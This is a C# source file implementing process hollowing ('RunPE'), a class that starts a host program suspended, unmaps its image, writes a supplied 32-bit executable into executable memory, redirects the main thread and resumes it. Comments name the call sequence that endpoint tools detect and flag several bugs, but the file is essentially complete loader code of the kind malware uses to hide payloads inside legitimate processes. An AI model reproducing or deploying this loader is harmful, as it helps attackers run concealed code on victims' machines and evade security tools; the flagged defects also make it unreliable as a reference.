  1. using System;
  2. using System.Runtime.InteropServices;
  3.  
/// <summary>
/// Loads a 32-bit PE image from a byte buffer into a freshly created, suspended
/// instance of <c>hostProcess</c> and resumes it with the image's entry point
/// (the technique commonly called "process hollowing" / RunPE).
/// </summary>
/// <remarks>
/// Defensive note: the call sequence used here — CreateProcess(CREATE_SUSPENDED),
/// NtUnmapViewOfSection, VirtualAllocEx(PAGE_EXECUTE_READWRITE), NtWriteVirtualMemory,
/// NtSetContextThread, NtResumeThread — is the canonical behavioural signature that
/// EDR and sandbox tooling key on for hollowing detection. All structure sizes and
/// offsets below are the 32-bit layouts (IMAGE_NT_HEADERS32, x86 CONTEXT); nothing
/// here validates that the buffer or the host is actually 32-bit.
/// </remarks>
public static unsafe class CMemoryExecute
{
    /// <summary>
    /// Parses the PE headers in <paramref name="exeBuffer"/>, spawns <paramref name="hostProcess"/>
    /// suspended, replaces its mapped image with the buffer contents and resumes its main thread.
    /// </summary>
    /// <param name="exeBuffer">Raw bytes of a 32-bit PE executable; only the MZ and PE signatures are checked.</param>
    /// <param name="hostProcess">Command line passed to CreateProcess as <c>lpCommandLine</c> (no application name).</param>
    /// <returns>
    /// <c>false</c> if the MZ/PE signature check or CreateProcess fails; <c>true</c> once the thread
    /// has been resumed. The NTSTATUS results of the Nt* calls are never inspected, so <c>true</c>
    /// does not mean the write/context steps succeeded.
    /// </returns>
    public static bool Run(byte[] exeBuffer, string hostProcess)
    {
        // Scratch copies of the PE / Win32 structures, sized to their 32-bit definitions.
        var IMAGE_SECTION_HEADER = new byte[0x28]; // pish
        var IMAGE_NT_HEADERS = new byte[0xf8]; // pinh
        var IMAGE_DOS_HEADER = new byte[0x40]; // pidh
        var PROCESS_INFO = new int[0x4]; // pi  — [0] hProcess, [1] hThread, [2] dwProcessId, [3] dwThreadId
        var CONTEXT = new byte[0x2cc]; // ctx — x86 CONTEXT

        // NOTE(review): each pointer below escapes its `fixed` statement. Once the block ends
        // the array is no longer pinned, so the raw pointer is only valid while the GC does
        // not move the array; nothing in this method guarantees that.
        byte* pish;
        fixed (byte* p = &IMAGE_SECTION_HEADER[0])
            pish = p;

        byte* pinh;
        fixed (byte* p = &IMAGE_NT_HEADERS[0])
            pinh = p;

        byte* pidh;
        fixed (byte* p = &IMAGE_DOS_HEADER[0])
            pidh = p;

        byte* ctx;
        fixed (byte* p = &CONTEXT[0])
            ctx = p;

        // Set the flag.  CONTEXT_FULL tells NtGetContextThread which register groups to fill.
        *(uint*)(ctx + 0x0 /* ContextFlags */) = CONTEXT_FULL;

        // Get the DOS header of the EXE.
        Buffer.BlockCopy(exeBuffer, 0, IMAGE_DOS_HEADER, 0, IMAGE_DOS_HEADER.Length);

        /* Sanity check:  See if we have MZ header. */
        if (*(ushort*)(pidh + 0x0 /* e_magic */) != IMAGE_DOS_SIGNATURE)
            return false;

        // Offset of the PE header relative to the start of the file; taken from the buffer
        // unvalidated, so a malformed e_lfanew makes the next BlockCopy throw.
        var e_lfanew = *(int*)(pidh + 0x3c);

        // Get the NT header of the EXE.
        Buffer.BlockCopy(exeBuffer, e_lfanew, IMAGE_NT_HEADERS, 0, IMAGE_NT_HEADERS.Length);

        /* Sanity check: See if we have PE00 header. */
        if (*(uint*)(pinh + 0x0 /* Signature */) != IMAGE_NT_SIGNATURE)
            return false;

        // Spawn the host suspended so its main thread can be redirected before it runs.
        // lpStartupInfo is a zeroed 0x44-byte buffer (32-bit STARTUPINFO size); its cb field is never set.
        if (!CreateProcess(null, hostProcess, IntPtr.Zero, IntPtr.Zero, false, CREATE_SUSPENDED, IntPtr.Zero, null, new byte[0x44], PROCESS_INFO))
            return false;

        // Preferred load address from OptionalHeader.ImageBase (offset 0x34 in IMAGE_NT_HEADERS32).
        var ImageBase = new IntPtr(*(int*)(pinh + 0x34));
        // Unmap the host's own image and reserve RWX memory at the payload's preferred base.
        NtUnmapViewOfSection((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase);
        if (VirtualAllocEx((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, *(uint*)(pinh + 0x50 /* SizeOfImage */), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == IntPtr.Zero)
            // NOTE(review): the recursive call's result is discarded and execution falls through
            // with the current (unallocated) process, and the recursion itself is unbounded.
            Run(exeBuffer, hostProcess); // Memory allocation failed; try again (this can happen in low memory situations)

        // Copy the PE headers into the host.
        fixed (byte* p = &exeBuffer[0])
            NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, (IntPtr)p, *(uint*)(pinh + 84 /* SizeOfHeaders */), IntPtr.Zero);

        // Copy each section from its file offset to its virtual address inside the host.
        // Section headers follow IMAGE_NT_HEADERS directly; their fields are trusted as-is.
        for (ushort i = 0; i < *(ushort*)(pinh + 0x6 /* NumberOfSections */); i++)
        {
            Buffer.BlockCopy(exeBuffer, e_lfanew + IMAGE_NT_HEADERS.Length + (IMAGE_SECTION_HEADER.Length * i), IMAGE_SECTION_HEADER, 0, IMAGE_SECTION_HEADER.Length);
            fixed (byte* p = &exeBuffer[*(uint*)(pish + 0x14 /* PointerToRawData */)])
                NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)((int)ImageBase + *(uint*)(pish + 0xc /* VirtualAddress */)), (IntPtr)p, *(uint*)(pish + 0x10 /* SizeOfRawData */), IntPtr.Zero);
        }

        // Read the suspended main thread's registers, write ImageBase to the address held in ecx,
        // point eax at the payload entry point, write the registers back and let the thread run.
        NtGetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, (IntPtr)ctx);
        NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)(*(uint*)(ctx + 0xAC /* ecx */)), ImageBase, 0x4, IntPtr.Zero);
        *(uint*)(ctx + 0xB0 /* eax */) = (uint)ImageBase + *(uint*)(pinh + 0x28 /* AddressOfEntryPoint */);
        NtSetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, (IntPtr)ctx);
        NtResumeThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, IntPtr.Zero);

        // The process and thread handles in PROCESS_INFO are never closed.
        return true;
    }

    #region WinNT Definitions

    // Values as defined in the Win32 SDK headers (winnt.h / winbase.h).
    private const uint CONTEXT_FULL = 0x10007;
    private const int CREATE_SUSPENDED = 0x4;
    private const int MEM_COMMIT = 0x1000;
    private const int MEM_RESERVE = 0x2000;
    private const int PAGE_EXECUTE_READWRITE = 0x40;
    private const ushort IMAGE_DOS_SIGNATURE = 0x5A4D; // MZ
    private const uint IMAGE_NT_SIGNATURE = 0x00004550; // PE00

    #region WinAPI
    // STARTUPINFO and PROCESS_INFORMATION are passed as opaque byte[]/int[] buffers
    // rather than marshalled structs; the caller is responsible for their layout.
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, byte[] lpStartupInfo, int[] lpProcessInfo);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    // The Nt* routines below return NTSTATUS codes; SetLastError has no effect on them
    // and none of their results are checked by Run.
    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern uint NtUnmapViewOfSection(IntPtr hProcess, IntPtr lpBaseAddress);

    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern int NtWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, IntPtr lpNumberOfBytesWritten);

    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern int NtGetContextThread(IntPtr hThread, IntPtr lpContext);

    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern int NtSetContextThread(IntPtr hThread, IntPtr lpContext);

    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern uint NtResumeThread(IntPtr hThread, IntPtr SuspendCount);
    #endregion

    #endregion
}